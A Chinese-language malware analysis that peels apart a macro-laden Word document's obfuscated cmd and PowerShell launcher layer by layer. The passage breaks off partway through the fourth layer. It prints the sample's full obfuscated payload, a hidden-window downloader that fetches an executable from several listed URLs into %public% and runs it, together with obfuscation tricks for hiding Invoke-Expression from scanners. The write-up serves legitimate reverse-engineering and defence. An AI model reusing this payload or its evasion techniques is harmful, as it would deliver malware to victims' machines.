记一次Powershell反混淆 (1)

样本地址:
https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1cb0e0/detection

样本是一个嵌入了宏（VBA Macros）的 Word 文档。寻找命令执行点比较简单：稍微跟一下宏代码，就直接定位到下面这个包含 Shell 调用的过程：

' Command-execution point of the macro, exactly as found in the sample.
' The only statement with an observable effect is the Shell call; the four
' arithmetic lines around it read variables that appear to be undeclared and
' produce nothing that is used later (filler, presumably meant to pad the
' routine and defeat simple signature matching).  "On Error Resume Next" keeps
' any fault in that filler - or in the Shell call itself - from surfacing.
Sub SssbuNrRrEn(UJXYrqZETb As String)
On Error Resume Next
' Filler (no effect on the payload).
MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)
zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoin / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)
' Executes the caller-supplied command line (the cmd -> PowerShell chain shown
' later in this write-up).  Window style 0 is vbHide: no console window is
' shown, so the user sees nothing when the document is opened.
Shell UJXYrqZETb, 0
' Filler (no effect on the payload).
CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)
HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)
End Sub

明显可以看到 UJXYrqZETb 比较关键：它就是被传给 Shell 执行的那条命令行。len(UJXYrqZETb) = 3263，超过了 Debug → Add Watch 窗口能完整显示的长度，因此改为在 Shell 调用之前把 UJXYrqZETb 写入文件，从而获取完整的值。注意：运行宏之前务必先把 `Shell UJXYrqZETb, 0` 这一行注释掉，否则 payload 会被真正执行；整个过程都应在隔离的分析虚拟机中进行。

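' Instrumented copy of the sample's launcher, used to recover the Shell argument.
' UJXYrqZETb is the 3263-character command string; the VBA watch window cannot
' show it in full, so it is dumped to a file instead.  The Shell call is
' commented out so the payload is never executed.  Run only inside an isolated
' analysis VM.
Sub SssbuNrRrEn(UJXYrqZETb As String)
Dim objFSO As Object
Dim objFile As Object
Dim outFile As String

' The sample's own error suppression, kept only for the filler arithmetic below
' (it references variables that appear to be undeclared).
On Error Resume Next
MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)
zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoin / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)

' Stop swallowing errors from here on: a failed dump must surface, otherwise an
' empty or stale output.txt could be mistaken for the real payload.
On Error GoTo 0

' The current user's %TEMP% is writable without elevation; C:\Windows\Temp
' often is not, and under Resume Next that failure would have gone unnoticed.
outFile = Environ("TEMP") & "\output.txt"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile(outFile, True)
' Write the actual argument - not a placeholder - that is the whole point of the hook.
objFile.Write UJXYrqZETb
objFile.Close

' Original execution point, deliberately disabled (window style 0 = vbHide).
' Shell UJXYrqZETb, 0

' Remaining filler from the sample, again under the sample's own error handling.
On Error Resume Next
CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)
HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)
End Sub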

查看 output.txt 即可得到完整的 cmd 命令行，也就是下面这一整段（文件中它是连续的一条命令，这里为了显示被折行了）：

REM Layer 0 - the Shell argument recovered from output.txt.  It is one command
REM line; the break before "(Y4E.e..." below is display wrapping only.
REM The tokens before the first "&" look like filler; the part that matters is
REM   %ComSpec% /V /c set A=p^o^w^er && set B=^sh^ell && !A!!B! "<powershell code>"
REM The carets are cmd escape characters that vanish when the line is parsed and
REM /V turns on delayed (!var!) expansion, so the word "powershell" only exists
REM after the two set statements run - a naive search for that string in the
REM macro text would miss this stage.
REM The quoted PowerShell argument builds its invoker as
REM   $VerbosePreference.ToString()[1,3]+'X' -join ''
REM ("SilentlyContinue"[1]='i', [3]='e', plus 'X' = ieX) and hands it the
REM next layer.  Nothing touches disk or network at this stage.
cmd     hhwjquui   qwgeui   qwgeiqweqwe iqw  ohd   ioqwhd   ioqwhido  &       %C^om^S^p^Ec%          /V         /c           set %VBiwAbXNZVRf%=p^o^w^er&&set %WVXlCPwVdc%=^sh^ell&&!%VBiwAbXNZVRf%!!%WVXlCPwVdc%! " & ( $VErBOSePReFErenCe.TOSTrIng()[1,3]+'X'-joIn'')( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ 
(Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace  'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )

然后像剥洋葱一样一层一层地解开。每一层的结构都一样：一个拼接出来的长字符串，经过若干次 -replace / .Replace 替换后交给 ieX（Invoke-Expression）执行。所以静态剥离的办法是：不要真的运行 ieX，而是把最外层的 ieX 换成 Write-Output（或直接对字符串应用那几条替换），打印出来的就是下一层：

# Layer 1 - the argument the cmd stage's ieX receives (the "ieX(" at the front
# stands for the invoker rebuilt from $VerbosePreference in layer 0).
# Still pure string surgery: the long literal is assembled from '+'-joined
# fragments and then passed through
#   -creplace 'cv5' -> [char]39 (')    -replace 'X2z' ([char]88+50+122) -> [char]124 (|)
#   -creplace 'j3x' -> [char]36 ($)
# before being fed to ieX again.  Nothing is downloaded or written yet; to peel
# this layer without executing it, apply the three replacements to the string
# (or swap the outer ieX for Write-Output).
ieX( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ (Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 
4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace  'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )
# Layer 2 - layer 1 with the cv5 / X2z / j3x substitutions applied.
# The second invoker is now visible at the front:
#   ([string]$VerbosePreference)[1,3]+'X' -join ''  ->  "SilentlyContinue"[1],[3] = 'i','e' + 'X' = ieX
# The inner string still carries two placeholders that the tail replaces:
#   'S0P' ([char]83+48+80) -> '      and      '6wn' -> '|'
# so, again, nothing here executes anything real yet.
# Display note: this blob is hard-wrapped at a fixed width in the write-up
# (lines break mid-token), so it is not directly runnable as shown.
ieX(  .( ([stRINg]$VeRBoSepreFerence)[1,3]+'X'-Join'') ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((
iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+
iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMP
oS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4i
MP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP
+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S
0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP
+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i
'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iM
P/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iM
PY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+i
MPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iM
P+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiM
P+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iM
PoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+i
MPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4
YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 -cRS0P+S0'+'PEPLACei
MPW2KiMP,[Char]34 -rEpLace  iMPjPIiMP,[Char]92  -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([
Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118
+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAc
E(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|'))  )


# Layer 3 - layer 2 with the $VerbosePreference trick resolved to ".ieX".
# The only work left in this layer is the trailing
#   .Replace('S0P', "'") .Replace('6wn', '|')
# once those are applied the third invoker, (Get-Variable '*MDr*').Name[3,11,2],
# becomes readable (see the next layer).
ieX(  .ieX ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+iMPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iMP+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 
-cRS0P+S0'+'PEPLACeiMPW2KiMP,[Char]34 -rEpLace  iMPjPIiMP,[Char]92  -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAcE(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|'))  )

# Layer 4 - after S0P -> ' and 6wn -> |.  The third invoker is now legible:
#   (Get-Variable '*MDr*').Name[3,11,2] -join ''  ->  "MaximumDriveCount"[3],[11],[2] = 'i','e','x'
# i.e. yet another Invoke-Expression, this time derived from the name of a
# built-in variable rather than from any string literal - a trick to keep the
# token "iex" out of the script text entirely.
# Tail replacements still pending in this layer:
#   'vGA' ([char]118+71+65) -> '|'    'IdQ' -> '$' ([char]36)    'iMP' -> "'" ([char]39)
ieX(  .ieX .((gET-vaRIAbLE '*MDr*').NamE[3,11,2]-joiN'') ( ('((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-oiMP+iM
PbjeiMP+iM'+'P'+'cY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMP'+') random;4YoiMP+iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iM
P+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPo'+'bjectYiMP+iMP4E)iMP+iMP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMP
SBiMP+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.n'+'extiMP+iMP(10000, 2iMP+iMP82133)iMP+i'+'MP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX
 = i'+'MP+iMPY4EiMP+iM'+'P iMP+iMPhtiMP+iMPtp:/iMP+iM'+'P/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFW'+'/?i'
+'MP+iMP'+'http:iMP+iMP/iMP+iMP/iMP+iMPdiMP+iMPuiMP+iMPlfaciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa
/iMP+i'+'MP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMP'+'.au/'+'kiMP+iMPRiMP+iMPBGS7'+'/?iMP+iM'+'PhttiMP+iMPps
://www.blueyachtchiMP+iMParter.com/DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+iMPzurew'+'iMP+iMPebsitesiMP+iM
P.net/oMgoZ/Y4iMP+iMPE.iMP+iMPSplit(iMP+iMPY4E?Y4E);4YiMP+iMPoSDC'+'iMP+iMP iMP+iMP= 4YiMP+iMPoi'+'MP+iMPeniMP'+'+iMPv:
publiiMP+iMPc + iMP+iMPY4iMP+iMPEiMP+iMPjPIY4E +iMP+iM'+'P 4YoNiMP+iMPSiMP+iMPB iMP+iMP+ (Y4E.eiMP+iMPxY4E+Y4EeYiMP+iMP
4E)iMP+iMP;iMP+iMPfiMP+iMPoreaiMP+iMPciMP+iMPhiMP+iMP(4Yoai'+'MP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+
iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLdliM'+'P+iMP'+'eiMP+iMPWiMP+iMP2K(4YiMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPK
i'+'MP+iMPTiM'+'P+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPInvoiMP+iMPY4'+'EiMP+iMP+Y4EkY4iMP+iM
PEiMP+iM'+'P+Y4EiMP+iMPe-IiMP+iMPteiMP+'+'iMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89
+[Char]52+[Char]69),[C'+'har]39 -cR'+'EPLACeiMPW2KiMP,[Char]34 -rEpLace  iMPjPIiMP,[Char]92  -cREPLACe([Char]52+[Char]8
9+[Char]111),[Char]3'+'6-cREPLACe([Char]118+[Char]76+[Ch'+'ar]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iM'+'PX
